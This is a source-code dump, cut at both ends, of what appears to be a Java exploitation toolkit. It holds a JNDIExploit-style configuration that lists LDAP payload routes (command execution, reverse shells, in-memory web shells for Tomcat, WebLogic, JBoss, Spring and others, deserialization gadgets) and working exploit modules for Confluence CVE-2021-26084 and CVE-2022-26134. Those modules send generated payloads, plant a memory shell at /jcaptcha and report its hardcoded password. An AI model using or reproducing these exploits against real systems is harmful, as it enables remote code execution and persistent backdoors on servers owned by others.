        return new HashMap(this.classBytes);
    }

    @Override
    public void flush() throws IOException {
    }

    /** Discards all recorded class bytes. */
    @Override
    public void close() throws IOException {
        classBytes.clear();
    }

    @Override
    public JavaFileObject getJavaFileForOutput(Location location, String className, JavaFileObject.Kind kind,
                                               FileObject sibling) throws IOException {
        if (kind == JavaFileObject.Kind.CLASS) {
            return new MemoryOutputJavaFileObject(className);
        } else {
            return super.getJavaFileForOutput(location, className, kind, sibling);
        }
    }

    /** Wraps code as a SOURCE file object whose URI is "string:///" + name. */
    JavaFileObject makeStringSource(String name, String code) {
        return new MemoryInputJavaFileObject(name, code);
    }

    /** Read-only source file backed by a String. */
    static class MemoryInputJavaFileObject extends SimpleJavaFileObject {

        final String code;

        MemoryInputJavaFileObject(String name, String code) {
            super(URI.create("string:///" + name), Kind.SOURCE);
            this.code = code;
        }

        @Override
        public CharBuffer getCharContent(boolean ignoreEncodingErrors) {
            return CharBuffer.wrap(code);
        }
    }

    /**
     * Inner (non-static) class so that its output stream can write into the
     * enclosing manager's classBytes; see openOutputStream below.
     */
    class MemoryOutputJavaFileObject extends SimpleJavaFileObject {
        final String name;

MemoryOutputJavaFileObject(String name) {
            super(URI.create("string:///" + name), Kind.CLASS);
            this.name = name;
        }

        /**
         * Returns a stream whose close() copies everything written into the
         * enclosing manager's classBytes under this object's name. Bytes written
         * to a stream that is never closed are never recorded.
         */
        @Override
        public OutputStream openOutputStream() {
            return new FilterOutputStream(new ByteArrayOutputStream()) {
                @Override
                public void close() throws IOException {
                    out.close();
                    ByteArrayOutputStream bos = (ByteArrayOutputStream) out;
                    classBytes.put(name, bos.toByteArray());
                }
            };
        }

    }

    /**
     * Load class from byte[] which is compiled in memory.
     *
     * @author michael
     */
    static class MemoryClassLoader extends URLClassLoader {

        // class name to class bytes:
        // NOTE(review): presumably Map<String, byte[]>; the type arguments appear
        // to have been stripped from this listing (findClass assigns get() to byte[]).
        Map classBytes = new HashMap();

        /** Copies the supplied map; the parent is MemoryClassLoader's own loader, with no URLs. */
        public MemoryClassLoader(Map classBytes) {
            super(new URL[0], MemoryClassLoader.class.getClassLoader());
            this.classBytes.putAll(classBytes);
        }

        /**
         * Defines name from the stored bytes and then removes them from the map,
         * so a second findClass call for the same name falls through to
         * URLClassLoader.findClass (which has no URLs to search), as does any
         * name that was never stored.
         */
        @Override
        protected Class findClass(String name) throws ClassNotFoundException {
            byte[] buf = classBytes.get(name);
            if (buf == null) {
                return super.findClass(name);
            }
            classBytes.remove(name);
            return defineClass(name, buf, 0, buf.length);
        }

    }
}
// ---- /src/main/java/core/utils/Config.java ----
package core.utils;

import com.beust.jcommander.JCommander;
import com.beust.jcommander.Parameter;
import com.beust.jcommander.UnixStyleUsageFormatter;

/**
 * Command-line configuration parsed with JCommander. All settings are static
 * fields, so one parse applies to the whole process; codeBase is derived from
 * ip and httpPort at the end of applyCmdArgs (the class continues below).
 */
public class Config {
    public static String codeBase;   // "http://<ip>:<httpPort>/", set by applyCmdArgs

    @Parameter(names = {"-i", "--ip"}, description = "Local ip address ", required = true, order = 1)
    public static String ip;

    @Parameter(names = {"-l", "--ldapPort"}, description = "Ldap bind port", order = 2)
    public static int ldapPort = 1389;

    @Parameter(names =
{"-p", "--httpPort"}, description = "Http bind port", order = 3) 17 | public static int httpPort = 8080; 18 | 19 | @Parameter(names = {"-u", "--usage"}, description = "Show usage", order = 4) 20 | public static boolean showUsage; 21 | 22 | @Parameter(names = {"-h", "--help"}, help = true, description = "Show this help") 23 | private static boolean help = false; 24 | 25 | public static void applyCmdArgs(String[] args) { 26 | //process cmd args 27 | JCommander jc = JCommander.newBuilder() 28 | .addObject(new Config()) 29 | .build(); 30 | try { 31 | jc.parse(args); 32 | } catch (Exception e) { 33 | if (!showUsage) { 34 | System.out.println("Error: " + e.getMessage() + "\n"); 35 | help = true; 36 | } 37 | } 38 | 39 | if (showUsage) { 40 | String ip = (Config.ip != null) ? Config.ip : "[IP]"; 41 | String port = (Config.ip != null) ? Config.ldapPort + "" : "[PORT]"; 42 | 43 | System.out.println("Supported LADP Queries:"); 44 | System.out.println("* all words are case INSENSITIVE when send to ldap server"); 45 | String prefix = "ldap://" + Config.ip + ":" + Config.ldapPort + "/"; 46 | System.out.println("\n[+] Basic Queries: " + prefix + "Basic/[PayloadType]/[Params], e.g."); 47 | System.out.println(" " + prefix + "Basic/Dnslog/[domain]"); 48 | System.out.println(" " + prefix + "Basic/Command/[cmd]"); 49 | System.out.println(" " + prefix + "Basic/Command/Base64/[base64_encoded_cmd]"); 50 | System.out.println(" " + prefix + "Basic/ReverseShell/[ip]/[port] ---windows NOT supported"); 51 | System.out.println(" " + prefix + "Basic/TomcatEcho"); 52 | System.out.println(" " + prefix + "Basic/SpringEcho"); 53 | System.out.println(" " + prefix + "Basic/WeblogicEcho"); 54 | System.out.println(" " + prefix + "Basic/TomcatMemshell1"); 55 | System.out.println(" " + prefix + "Basic/TomcatMemshell2 ---need extra header [shell: true]"); 56 | System.out.println(" " + prefix + "Basic/JettyMemshell"); 57 | System.out.println(" " + prefix + "Basic/WeblogicMemshell1"); 58 | 
System.out.println(" " + prefix + "Basic/WeblogicMemshell2"); 59 | System.out.println(" " + prefix + "Basic/JBossMemshell"); 60 | System.out.println(" " + prefix + "Basic/WebsphereMemshell"); 61 | System.out.println(" " + prefix + "Basic/SpringMemshell"); 62 | 63 | System.out.println("\n[+] Deserialize Queries: " + prefix + "Deserialization/[GadgetType]/[PayloadType]/[Params], e.g."); 64 | System.out.println(" " + prefix + "Deserialization/URLDNS/[domain]"); 65 | System.out.println(" " + prefix + "Deserialization/CommonsCollectionsK1/Dnslog/[domain]"); 66 | System.out.println(" " + prefix + "Deserialization/CommonsCollectionsK2/Command/Base64/[base64_encoded_cmd]"); 67 | System.out.println(" " + prefix + "Deserialization/CommonsBeanutils1/ReverseShell/[ip]/[port] ---windows NOT supported"); 68 | System.out.println(" " + prefix + "Deserialization/CommonsBeanutils2/TomcatEcho"); 69 | System.out.println(" " + prefix + "Deserialization/C3P0/SpringEcho"); 70 | System.out.println(" " + prefix + "Deserialization/Jdk7u21/WeblogicEcho"); 71 | System.out.println(" " + prefix + "Deserialization/Jre8u20/TomcatMemshell"); 72 | System.out.println(" " + prefix + "Deserialization/CVE_2020_2555/WeblogicMemshell1"); 73 | System.out.println(" " + prefix + "Deserialization/CVE_2020_2883/WeblogicMemshell2 ---ALSO support other memshells"); 74 | 75 | System.out.println("\n[+] TomcatBypass Queries"); 76 | System.out.println(" " + prefix + "TomcatBypass/Dnslog/[domain]"); 77 | System.out.println(" " + prefix + "TomcatBypass/Command/[cmd]"); 78 | System.out.println(" " + prefix + "TomcatBypass/Command/Base64/[base64_encoded_cmd]"); 79 | System.out.println(" " + prefix + "TomcatBypass/ReverseShell/[ip]/[port] ---windows NOT supported"); 80 | System.out.println(" " + prefix + "TomcatBypass/TomcatEcho"); 81 | System.out.println(" " + prefix + "TomcatBypass/SpringEcho"); 82 | System.out.println(" " + prefix + "TomcatBypass/TomcatMemshell1"); 83 | System.out.println(" " + prefix + 
"TomcatBypass/TomcatMemshell2 ---need extra header [shell: true]"); 84 | System.out.println(" " + prefix + "TomcatBypass/SpringMemshell"); 85 | 86 | System.out.println("\n[+] GroovyBypass Queries"); 87 | System.out.println(" " + prefix + "GroovyBypass/Command/[cmd]"); 88 | System.out.println(" " + prefix + "GroovyBypass/Command/Base64/[base64_encoded_cmd]"); 89 | 90 | System.out.println("\n[+] WebsphereBypass Queries"); 91 | System.out.println(" " + prefix + "WebsphereBypass/List/file=[file or directory]"); 92 | System.out.println(" " + prefix + "WebsphereBypass/Upload/Dnslog/[domain]"); 93 | System.out.println(" " + prefix + "WebsphereBypass/Upload/Command/[cmd]"); 94 | System.out.println(" " + prefix + "WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]"); 95 | System.out.println(" " + prefix + "WebsphereBypass/Upload/ReverseShell/[ip]/[port] ---windows NOT supported"); 96 | System.out.println(" " + prefix + "WebsphereBypass/Upload/WebsphereMemshell"); 97 | System.out.println(" " + prefix + "WebsphereBypass/RCE/path=[uploaded_jar_path] ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp"); 98 | 99 | System.exit(0); 100 | } 101 | 102 | // //获取当前 Jar 的名称 103 | // String jarPath = Starter.class.getProtectionDomain().getCodeSource().getLocation().getPath(); 104 | jc.setProgramName("java -jar JNDIExploit-1.2-SNAPSHOT.jar"); 105 | jc.setUsageFormatter(new UnixStyleUsageFormatter(jc)); 106 | 107 | if (help) { 108 | jc.usage(); //if -h specified, show help and exit 109 | System.exit(0); 110 | } 111 | 112 | // 特别注意:最后一个反斜杠不能少啊 113 | Config.codeBase = "http://" + Config.ip + ":" + Config.httpPort + "/"; 114 | } 115 | } 116 | -------------------------------------------------------------------------------- /src/main/java/core/utils/MyURLClassLoader.java: -------------------------------------------------------------------------------- 1 | package core.utils; 2 | 3 | import java.io.File; 4 | import java.lang.reflect.InvocationTargetException; 5 | import 
java.lang.reflect.Method;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;

/**
 * Loads classes from a jar bundled under the "libs" resource directory through a
 * dedicated URLClassLoader, deliberately bypassing parent-first delegation so a
 * jar-local class wins over a same-named class already on the application
 * classpath (see loadClass). Generic type arguments may have been stripped
 * from this listing.
 */
public class MyURLClassLoader {
    private URLClassLoader classLoader;   // stays null if getURLClassLoader threw (the exception is only printed)

    /**
     * @param jarName file name of a jar under the "libs" resource directory
     */
    public MyURLClassLoader(String jarName) {
        try {
            classLoader = getURLClassLoader(jarName);
        } catch (MalformedURLException e) {
            e.printStackTrace();
        }
    }

    /**
     * Defines className from the jar by invoking URLClassLoader.findClass
     * reflectively (it is protected), skipping the parent delegation that
     * loadClass would perform.
     * Original comment (translated): the project already ships
     * commons-beanutils:1.9.4, so loadClass would resolve the copy on the
     * project classpath; findClass is called instead to avoid that.
     *
     * @return the Class, or null if any of the three listed reflection
     *         exceptions occurs (it is printed). NOTE(review): on JDK 9+ the
     *         setAccessible call may be refused unless java.base/java.net is
     *         opened — confirm; that failure is a RuntimeException and is not
     *         caught here.
     */
    public Class loadClass(String className) {
        try {
            Method method = URLClassLoader.class.getDeclaredMethod("findClass", new Class[]{String.class});
            method.setAccessible(true);
            Class clazz = (Class) method.invoke(this.classLoader, new Object[]{className});
            return clazz;
        } catch (NoSuchMethodException e) {
            e.printStackTrace();
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        } catch (InvocationTargetException e) {
            // wraps whatever findClass threw (e.g. ClassNotFoundException)
            e.printStackTrace();
        }

        return null;
    }

    /**
     * Builds a URLClassLoader over the single resource "libs" + File.separator + jarName.
     * NOTE(review): getResource returns null when the resource is missing, and
     * File.separator is "\" on Windows whereas resource names use "/" — neither
     * case is handled here (a null URL is passed straight to the loader). The
     * declared MalformedURLException is not thrown by anything in this body.
     */
    private URLClassLoader getURLClassLoader(String jarName) throws MalformedURLException {
        URL url = this.getClass().getClassLoader().getResource("libs" + File.separator + jarName);
        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{url});
        return urlClassLoader;
    }

    /** Smoke test: loads BeanComparator from the bundled 1.9.2 jar and constructs one; the result is unused. */
    public static void main(String[] args) throws NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException {
        MyURLClassLoader classLoader = new MyURLClassLoader("commons-beanutils-1.9.2.jar");
        Class clazz = classLoader.loadClass("org.apache.commons.beanutils.BeanComparator");
        // Class clazz = classLoader.loadClass("org.apache.commons.beanutils.BeanComparator");
        Object comparator = clazz.getDeclaredConstructor(new Class[]{String.class}).newInstance(new Object[]{"lowestSetBit"});
    }
}
// ---- /src/main/java/core/utils/Util.java ----
package core.utils;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Method;
import java.util.Random;
import java.util.zip.GZIPOutputStream;

/**
 * Static helpers shared by the payload builders: class-file extraction from the
 * classpath, Base64 encode/decode that works on both pre- and post-Java-8
 * runtimes, Java serialization, and gzip compression.
 * Generic type arguments may have been stripped from this listing.
 */
public class Util {

    public static final String GZIP_ENCODE_UTF_8 = "UTF-8";   // not referenced in the visible part of this file

    /**
     * Returns 10 random characters drawn from [0-9A-Za-z].
     * NOTE(review): a new java.util.Random is constructed for every character;
     * this is not a cryptographic source and must not be used for anything secret.
     */
    public static String getRandomString() {
        String str = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i < 10; i++) {
            char ch = str.charAt(new Random().nextInt(str.length()));
            sb.append(ch);
        }
        return sb.toString();
    }

    /** Base64 (without line breaks) of clazz's class file bytes; see getClassBytes. */
    public static String getClassCode(Class clazz) throws Exception {
        byte[] bytes = getClassBytes(clazz);
        String result = Util.base64Encode(bytes);

        return result;
    }

    /**
     * Reads clazz's .class file as a resource from the class loader that loaded Util.
     *
     * @param clazz class whose bytecode is wanted; must exist as a classpath resource
     * @return the raw class file bytes
     * @throws Exception IOException from the read. NOTE(review): a missing
     *         resource makes getResourceAsStream return null, which surfaces as a
     *         NullPointerException at in.read; and the stream is not closed if
     *         the read throws.
     */
    public static byte[] getClassBytes(Class clazz) throws Exception {
        String className = clazz.getName();
        String resoucePath = className.replaceAll("\\.", "/") + ".class";
        InputStream in = Util.class.getProtectionDomain().getClassLoader().getResourceAsStream(resoucePath);
        byte[] bytes = new byte[1024];
        ByteArrayOutputStream baous = new ByteArrayOutputStream();
        int len = 0;
        while ((len = in.read(bytes)) != -1) {
            baous.write(bytes, 0, len);
        }

        in.close();
        baous.close();

        return baous.toByteArray();
    }

    /**
     * Base64-encodes bytes. Prefers java.util.Base64, invoked reflectively
     * (presumably so the class also compiles against pre-8 JDKs); when that class
     * is absent falls back to sun.misc.BASE64Encoder and strips the line breaks
     * that encoder inserts. Any other reflection failure propagates.
     */
    public static String base64Encode(byte[] bytes) throws Exception {
        String result;

        try {
            Class clazz = Class.forName("java.util.Base64");
            Method method = clazz.getDeclaredMethod("getEncoder");
            Object obj = method.invoke(null);
            method = obj.getClass().getDeclaredMethod("encodeToString", byte[].class);
            obj = method.invoke(obj, bytes);
            result = (String) obj;
        } catch (ClassNotFoundException e) {
            Class clazz = Class.forName("sun.misc.BASE64Encoder");
            Method method = clazz.getMethod("encodeBuffer", byte[].class);
            Object obj = method.invoke(clazz.newInstance(), bytes);
            result = (String) obj;
            result = result.replaceAll("\r|\n|\r\n", "");
        }

        return result;
    }

    /** Inverse of base64Encode, with the same java.util.Base64 / sun.misc fallback strategy. */
    public static byte[] base64Decode(String str) throws Exception {
        byte[] bytes;

        try {
            Class clazz = Class.forName("java.util.Base64");
            Method method = clazz.getDeclaredMethod("getDecoder");
            Object obj = method.invoke(null);
            method = obj.getClass().getDeclaredMethod("decode", String.class);
            obj = method.invoke(obj, str);
            bytes = (byte[]) obj;
        } catch (ClassNotFoundException e) {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            Method method = clazz.getMethod("decodeBuffer", String.class);
            Object obj = method.invoke(clazz.newInstance(), str);
            bytes = (byte[]) obj;
        }

        return bytes;
    }

    /**
     * Standard Java serialization of ref into a byte[].
     * NOTE(review): the ObjectOutputStream is neither flushed nor closed
     * explicitly — confirm nothing is left buffered before relying on the length.
     */
    public static byte[] serialize(Object ref) throws IOException {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        ObjectOutputStream objOut = new ObjectOutputStream(out);
        objOut.writeObject(ref);
        return out.toByteArray();
    }

    /**
     * Takes the last "/"-separated segment of base as a command string; if the
     * segment before it is "base64" (case-insensitive) the last segment is
     * Base64-decoded first (platform default charset).
     *
     * @param base a "/"-separated path such as ".../Command/Base64/<encoded>"
     * @return the last segment, decoded when so marked
     * NOTE(review): when base contains no "/" (or only a leading one), firstIndex
     * is -1 or 0 and substring(secondIndex + 1, firstIndex) throws
     * StringIndexOutOfBoundsException.
     */
    public static String getCmdFromBase(String base) throws Exception {
        int firstIndex = base.lastIndexOf("/");
        String cmd = base.substring(firstIndex + 1);

        int secondIndex = base.lastIndexOf("/", firstIndex - 1);
        if (secondIndex < 0) {
            secondIndex = 0;
        }

        if (base.substring(secondIndex + 1, firstIndex).equalsIgnoreCase("base64")) {
            byte[] bytes = Util.base64Decode(cmd);
            cmd = new String(bytes);
        }

        return cmd;
    }

    /**
     * Gzips the UTF-8 bytes of str and returns the compressed bytes as a String
     * decoded as ISO-8859-1 (one char per byte). null and "" are returned as-is.
     */
    public static String GZIPCompress(String
str)
            throws IOException
    {
        if ((str == null) || (str.length() == 0)) {
            return str;
        }
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        GZIPOutputStream gzip = new GZIPOutputStream(out);
        gzip.write(str.getBytes("UTF-8"));
        gzip.close();   // close() completes the gzip stream; out is only complete after this
        return out.toString("ISO-8859-1");   // one char per byte, so the binary output survives as a String
    }

}
// ---- /src/main/java/exp/AttackBase.java ----
package exp;

import java.util.HashMap;

/** Common entry point of the exp.* modules: run() receives its parameters as a HashMap. */
public interface AttackBase {
    void run(HashMap params) throws Exception;
}
// ---- /src/main/java/exp/BaseExp.java ----
package exp;


import okhttp3.Response;
import utils.UserAgentUtil;
import utils.okhttplib.OkHttp;
import utils.okhttplib.ProxyConfig;

import java.io.File;
import java.net.MalformedURLException;
import java.net.URI;
import java.net.URL;
import java.util.*;


/**
 * HTTP plumbing shared by the exp.* modules: a target url, an optional proxy,
 * a chunk count handed to OkHttp, and a header map that every launch() call
 * adds to. Requests go through utils.okhttplib.OkHttp (not visible here).
 * Generic type arguments may have been stripped from this listing.
 */
public abstract class BaseExp
{
    public String url = null;
    public int chunkCount = -1;              // forwarded to OkHttp.httpPost/httpPut; presumably -1 means "no chunking" — confirm in OkHttp
    public ProxyConfig proxyConfig = null;   // when non-null, the proxy overloads of OkHttp are used
    public HashMap headers = new HashMap();  // accumulates across launch() calls on this instance


    /**
     * Reduces target to "scheme://host:port".
     * NOTE(review): when target carries no explicit port the literal "80" is
     * used regardless of scheme, so an https URL is rendered as host:80;
     * url.getDefaultPort() would be scheme-aware. Malformed input is printed
     * and yields "".
     */
    public String getStripUrl(String target){
        try {
            URL url = new URL(target);
            int port = url.getPort();
            return url.getProtocol() + "://" + url.getHost() + ":" + ((port == -1) ?
                    "80" : String.valueOf(port));
        } catch (MalformedURLException e) {
            e.printStackTrace();
        }
        return "";
    }

    /**
     * HTTP GET to url. Sets a random User-Agent, merges headers (may be null)
     * into this.headers, and routes through the proxy when proxyConfig is set.
     * NOTE(review): this.headers is instance state, so headers merged here
     * persist into every later launch() call on the same object.
     */
    public Response launch(String url, HashMap headers) throws Exception {
        this.headers.put("User-Agent", UserAgentUtil.getRandomUserAgent());
        if (headers != null) {
            this.headers.putAll(headers);
        }
        if (this.proxyConfig != null) {
            return OkHttp.httpGet(url, this.headers, this.proxyConfig);
        }
        else {
            return OkHttp.httpGet(url, this.headers);
        }
    }

    /**
     * HTTP POST with a String body of MIME type mime; header handling as in the
     * GET overload, chunkCount forwarded to OkHttp.
     */
    public Response launch(String url, String body, String mime, HashMap headers) throws Exception {
        this.headers.put("User-Agent", UserAgentUtil.getRandomUserAgent());
        if (headers != null) {
            this.headers.putAll(headers);
        }
        if (this.proxyConfig != null) {
            return OkHttp.httpPost(url, body, mime, this.headers, this.proxyConfig, this.chunkCount);
        }
        else {
            return OkHttp.httpPost(url, body, mime, this.headers, this.chunkCount);
        }
    }

    /**
     * HTTP PUT (despite sharing the name launch) with a byte[] body; header
     * handling as in the GET overload, chunkCount forwarded to OkHttp.
     */
    public Response launch(String url, byte[] body, String mime, HashMap headers) throws Exception {
        this.headers.put("User-Agent", UserAgentUtil.getRandomUserAgent());
        if (headers != null) {
            this.headers.putAll(headers);
        }
        if (this.proxyConfig != null) {
            return OkHttp.httpPut(url, body, mime, this.headers, this.proxyConfig, this.chunkCount);
        }
        else {
            return OkHttp.httpPut(url, body, mime, this.headers, this.chunkCount);
        }
    }

    /**
     * HTTP POST with a byte[] body; same header and proxy handling as above.
     * (The method continues past the end of this listing.)
     */
    public Response launchPostByte(String url, byte[] body, String mime, HashMap headers) throws Exception {
        this.headers.put("User-Agent", UserAgentUtil.getRandomUserAgent());
        if (headers != null) {
            this.headers.putAll(headers);
        }
        if (this.proxyConfig != null) {
            return OkHttp.httpPost(url, body, mime, this.headers, this.proxyConfig, this.chunkCount);
        } else {
            return OkHttp.httpPost(url, body, mime, this.headers, this.chunkCount);
| } 84 | } 85 | 86 | 87 | } 88 | -------------------------------------------------------------------------------- /src/main/java/exp/Run.java: -------------------------------------------------------------------------------- 1 | package exp; 2 | 3 | import core.GenerateMemShell; 4 | import javafx.scene.control.TextArea; 5 | import utils.Util; 6 | 7 | import java.lang.reflect.Constructor; 8 | import java.lang.reflect.InvocationTargetException; 9 | import java.lang.reflect.Method; 10 | import java.util.HashMap; 11 | 12 | public class Run { 13 | public static void attack(TextArea textArea, String expName, HashMap params){ 14 | String packageName = expName.split("_")[0]; 15 | String classPath = "exp." + packageName.toLowerCase() + "." + expName; 16 | try { 17 | Class clazz = Class.forName(classPath); 18 | Constructor con = clazz.getConstructor(); 19 | Object aInstance = con.newInstance(); 20 | Method startMethod = clazz.getDeclaredMethod("run", HashMap.class); 21 | startMethod.invoke(aInstance, params); 22 | String message = Util.messageQueue.poll(); 23 | while (message !=null && !message.equalsIgnoreCase("")){ 24 | textArea.appendText(message); 25 | message = Util.messageQueue.poll(); 26 | } 27 | } catch (ClassNotFoundException ex) { 28 | ex.printStackTrace(); 29 | } catch (InvocationTargetException invocationTargetException) { 30 | invocationTargetException.printStackTrace(); 31 | } catch (InstantiationException instantiationException) { 32 | instantiationException.printStackTrace(); 33 | } catch (IllegalAccessException illegalAccessException) { 34 | illegalAccessException.printStackTrace(); 35 | } catch (NoSuchMethodException noSuchMethodException) { 36 | noSuchMethodException.printStackTrace(); 37 | } 38 | } 39 | 40 | public static String generateMemString(String memName, String encodeName, String version){ 41 | return GenerateMemShell.generateMemShell(memName, encodeName, version); 42 | } 43 | } 44 | 
--------------------------------------------------------------------------------
/src/main/java/exp/confluence/Confluence_CVE_2021_26084.java:
--------------------------------------------------------------------------------
package exp.confluence;

import core.GeneratePayload;
import exp.AttackBase;
import exp.BaseExp;
import okhttp3.Response;
import utils.Util;

import java.util.HashMap;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Module for Confluence CVE-2021-26084. Visible flow: read the version from
 * {@code /login.action}, POST the generated payload to
 * {@code /pages/doenterpagevariables.action}, then probe {@code /jcaptcha} with
 * {@code X-Requested-With} set and treat a body containing {@code "Success"}
 * as a planted shell.
 *
 * Defender note: the probe header value {@code XmlHTTPRequest} (mixed case, unlike
 * a browser's {@code XMLHttpRequest}) together with a {@code "Success"} body on
 * the listed path is a usable signature for this module family.
 */
public class Confluence_CVE_2021_26084 extends BaseExp implements AttackBase{

    // Confluence version string -> JDK selector passed on as trojanType.
    // Only the two versions below are mapped; anything else yields null.
    private static Map VersionToJdk = new HashMap();
    static{
        VersionToJdk.put("7.4.10", "jdk9");
        VersionToJdk.put("6.10.2", "jdk8");
    }

    /**
     * Reads the {@code ajs-version-number} meta tag from {@code /login.action}.
     *
     * @param stripUrl normalised origin
     * @return the version string, or {@code ""} when it is absent or any
     *         exception occurs (exceptions are swallowed silently)
     */
    public String checkVersion(String stripUrl){
        String version = "";
        try{
            HashMap header = new HashMap();
            header.put("Cache-Control", "max-age=0");
            header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36");
            Response response = this.launch(stripUrl + "/login.action", header);
            byte[] responseBytes =response.body().bytes();
            String bodyResult = new String(responseBytes, "utf-8");;
            response.close();
            if (bodyResult.contains("ajs-version-number")) {
                String pattern = "ajs-version-number\" content=\"([\\d.]+)";
                Pattern r = Pattern.compile(pattern);
                Matcher matcher = r.matcher(bodyResult);
                if(matcher.find()){
                    // group() is the whole match; the version is what follows `="`.
                    version = matcher.group().split("=\"")[1];
                }
            }
        }catch (Exception ex){

        }
        return version;
    }


    /**
     * Delivers the payload and verifies the result.
     *
     * @param stripUrl    normalised origin
     * @param gadgetType  gadget selector for {@code GeneratePayload}
     * @param payloadType payload selector for {@code GeneratePayload}
     * @param trojanType  JDK selector from {@link #VersionToJdk}
     */
    public void attack(String stripUrl, String gadgetType, String payloadType, String trojanType) {
        boolean success = false;
        Object payload = null;
        try {
            payload = GeneratePayload.generatePayload(gadgetType, payloadType, trojanType);
            HashMap header = new HashMap();
            header.put("Cache-Control", "max-age=0");
            header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36");
            header.put("Accept-Encoding", "gzip, deflate");
            header.put("Accept-Language", "zh-CN,zh;q=0.9");
            String mime = "application/x-www-form-urlencoded; charset=utf-8";
            // The response of the delivery request is not inspected or closed.
            this.launch(stripUrl +"/pages/doenterpagevariables.action" , (String)payload, mime, header);
            header.put("X-Requested-With", "XmlHTTPRequest");
            Response response = this.launch(stripUrl + "/jcaptcha", header);
            String bodyResult = response.body().string();
            response.close();
            if (bodyResult.contains("Success")) {
                // Results are queued for Run.attack to display; the credentials are fixed.
                Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/jcaptcha"));
                Util.messageQueue.add(String.format("PassWord: pAS3\n"));
                Util.messageQueue.add(String.format("Key: key\n"));
                Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n"));
                Util.messageQueue.add("---------------------------\n");
            }else {
                Util.messageQueue.add("注入失败");
            }

        }catch (Exception e){
            Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage()));
        }
    }

    /**
     * Reads {@code target}, {@code payloadType} and {@code gadgetType} from
     * {@code params}; returns silently when no version could be read.
     *
     * NOTE(review): {@code params} and {@code VersionToJdk} are raw types, so their
     * {@code get()} yields {@code Object}; these assignments presumably need a
     * cast to compile — verify build settings.
     */
    @Override
    public void run(HashMap params) {
        String target = params.get("target");
        String payloadType = params.get("payloadType");
        String gadgetType = params.get("gadgetType");

        String stripUrl = this.getStripUrl(target);

        String version = this.checkVersion(stripUrl);
        if (version.equals("")){
            return;
        }
        // Unmapped versions produce a null trojanType here.
        String trojanType = VersionToJdk.get(version);
        this.attack(stripUrl, gadgetType, payloadType, trojanType);

    }
}
--------------------------------------------------------------------------------
/src/main/java/exp/confluence/Confluence_CVE_2022_26134.java:
--------------------------------------------------------------------------------
package exp.confluence;

import core.GeneratePayload;
import exp.AttackBase;
import exp.BaseExp;
import okhttp3.Response;
import utils.Util;

import java.net.URLEncoder;
import java.util.HashMap;
import java.util.Map;

/**
 * Module for Confluence CVE-2022-26134. The generated payload is split on the
 * literal {@code "postData"}: the part before it becomes the request path, the
 * part after it is URL-encoded into a {@code search=} form field. Verification
 * is the same {@code /jcaptcha} probe as {@link Confluence_CVE_2021_26084}.
 *
 * Unlike the 2021 module, {@link #run} passes {@code target} through unchanged
 * (no {@code getStripUrl}), so the caller's URL form is used as-is.
 */
public class Confluence_CVE_2022_26134 extends BaseExp implements AttackBase {
    // Declared but never populated or read in this class.
    private static Map VersionToJdk = new HashMap();



    /**
     * Delivers the payload and verifies the result.
     *
     * @param stripUrl    base URL (used verbatim here)
     * @param gadgetType  gadget selector for {@code GeneratePayload}
     * @param payloadType payload selector for {@code GeneratePayload}
     * @param trojanType  template selector for {@code GeneratePayload}
     */
    public void attack(String stripUrl, String gadgetType, String payloadType, String trojanType) {
        boolean success = false;
        String payload = null;
        try {

            payload = (String)GeneratePayload.generatePayload(gadgetType, payloadType, trojanType);
            // payloads[0] = path, payloads[1] = form value; an ArrayIndexOutOfBounds
            // from a payload without the marker is caught by the catch below.
            String[] payloads = payload.split("postData");
            HashMap header = new HashMap();
            header.put("Cache-Control", "max-age=0");
            header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36");
            header.put("Accept-Encoding", "gzip, deflate");
            header.put("Accept-Language", "zh-CN,zh;q=0.9");
            String mime = "application/x-www-form-urlencoded; charset=utf-8";
            String postData = "search=" +URLEncoder.encode(payloads[1], "utf-8");
            this.launch(stripUrl +"/" + payloads[0] , postData, mime, header);
            header.put("X-Requested-With", "XmlHTTPRequest");
            Response response = this.launch(stripUrl + "/jcaptcha", header);
            String bodyResult = response.body().string();
            response.close();
            if (bodyResult.contains("Success")) {
                Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/jcaptcha"));
                Util.messageQueue.add(String.format("PassWord: pAS3\n"));
                Util.messageQueue.add(String.format("Key: key\n"));
                Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n"));
                Util.messageQueue.add("---------------------------\n");
            }else {
                Util.messageQueue.add("注入失败");
            }

        }catch (Exception e){
            Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage()));
        }
    }

    /** Reads {@code target}, {@code payloadType}, {@code gadgetType}, {@code trojanType} from {@code params}. */
    @Override
    public void run(HashMap params) {
        String target = params.get("target");
        String payloadType = params.get("payloadType");
        String gadgetType = params.get("gadgetType");
        String trojanType = params.get("trojanType");


        this.attack(target, gadgetType, payloadType, trojanType);

    }
}
--------------------------------------------------------------------------------
/src/main/java/exp/ecology/ECology_BeanShell_RCE.java:
--------------------------------------------------------------------------------
package exp.ecology;

import core.GeneratePayload;
import exp.AttackBase;
import exp.BaseExp;
import okhttp3.Response;
import utils.Util;

